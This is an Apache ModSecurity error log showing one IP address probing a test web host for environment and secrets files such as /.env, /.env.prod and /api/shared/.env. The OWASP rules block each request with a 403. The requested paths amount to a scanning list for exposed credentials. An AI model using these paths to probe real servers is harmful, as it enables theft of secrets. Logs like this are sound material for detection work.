[Wed Jan 07 03:50:27.314135 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpgAAAAE"]
[Wed Jan 07 03:50:27.361295 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpwAAAAE"]
[Wed Jan 07 03:50:27.361477 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpwAAAAE"]
[Wed Jan 07 03:50:27.361635 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpwAAAAE"]
[Wed Jan 07 03:50:27.518151 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aV3J88EIxEbNfU6y2MWMqgAAAAE"]
[Wed Jan 07 03:50:27.518322 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aV3J88EIxEbNfU6y2MWMqgAAAAE"]
[Wed Jan 07 03:50:27.518486 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aV3J88EIxEbNfU6y2MWMqgAAAAE"]
[Wed Jan 07 03:50:27.570420 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aV3J88EIxEbNfU6y2MWMqwAAAAE"]
[Wed Jan 07 03:50:27.570596 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aV3J88EIxEbNfU6y2MWMqwAAAAE"]
[Wed Jan 07 03:50:27.570744 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aV3J88EIxEbNfU6y2MWMqwAAAAE"]
[Wed Jan 07 03:50:27.618389 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aV3J88EIxEbNfU6y2MWMrAAAAAE"]
[Wed Jan 07 03:50:27.618563 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aV3J88EIxEbNfU6y2MWMrAAAAAE"]
[Wed Jan 07 03:50:27.618724 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aV3J88EIxEbNfU6y2MWMrAAAAAE"]
[Wed Jan 07 03:50:27.670399 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aV3J88EIxEbNfU6y2MWMrQAAAAE"]
[Wed Jan 07 03:50:27.670571 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aV3J88EIxEbNfU6y2MWMrQAAAAE"]
[Wed Jan 07 03:50:27.670738 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aV3J88EIxEbNfU6y2MWMrQAAAAE"]
[Wed Jan 07 03:50:27.719692 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aV3J88EIxEbNfU6y2MWMrgAAAAE"]
[Wed Jan 07 03:50:27.719888 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aV3J88EIxEbNfU6y2MWMrgAAAAE"]
[Wed Jan 07 03:50:27.720044 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aV3J88EIxEbNfU6y2MWMrgAAAAE"]
[Wed Jan 07 03:50:27.932767 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aV3J8xbsuCSf9NTQ9s_0WQAAAAM"]
[Wed Jan 07 03:50:27.932881 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aV3J8xbsuCSf9NTQ9s_0WQAAAAM"]
[Wed Jan 07 03:50:27.933082 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aV3J8xbsuCSf9NTQ9s_0WQAAAAM"]
[Wed Jan 07 03:50:27.933248 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aV3J8xbsuCSf9NTQ9s_0WQAAAAM"]
[Wed Jan 07 03:50:27.981378 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aV3J8xbsuCSf9NTQ9s_0WgAAAAM"]
[Wed Jan 07 03:50:27.981590 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aV3J8xbsuCSf9NTQ9s_0WgAAAAM"]
[Wed Jan 07 03:50:27.981748 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aV3J8xbsuCSf9NTQ9s_0WgAAAAM"]
[Wed Jan 07 03:50:28.086586 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XAAAAAM"]
[Wed Jan 07 03:50:28.086818 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XAAAAAM"]
[Wed Jan 07 03:50:28.087000 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XAAAAAM"]
[Wed Jan 07 03:50:28.137770 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XQAAAAM"]
[Wed Jan 07 03:50:28.137990 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XQAAAAM"]
[Wed Jan 07 03:50:28.138259 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XQAAAAM"]
[Wed Jan 07 03:50:28.191198 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XgAAAAM"]
[Wed Jan 07 03:50:28.191421 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XgAAAAM"]
[Wed Jan 07 03:50:28.191586 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XgAAAAM"]
[Wed Jan 07 03:50:28.254795 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XwAAAAM"]
[Wed Jan 07 03:50:28.255010 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XwAAAAM"]
[Wed Jan 07 03:50:28.255198 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0XwAAAAM"]
[Wed Jan 07 03:50:28.312582 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YAAAAAM"]
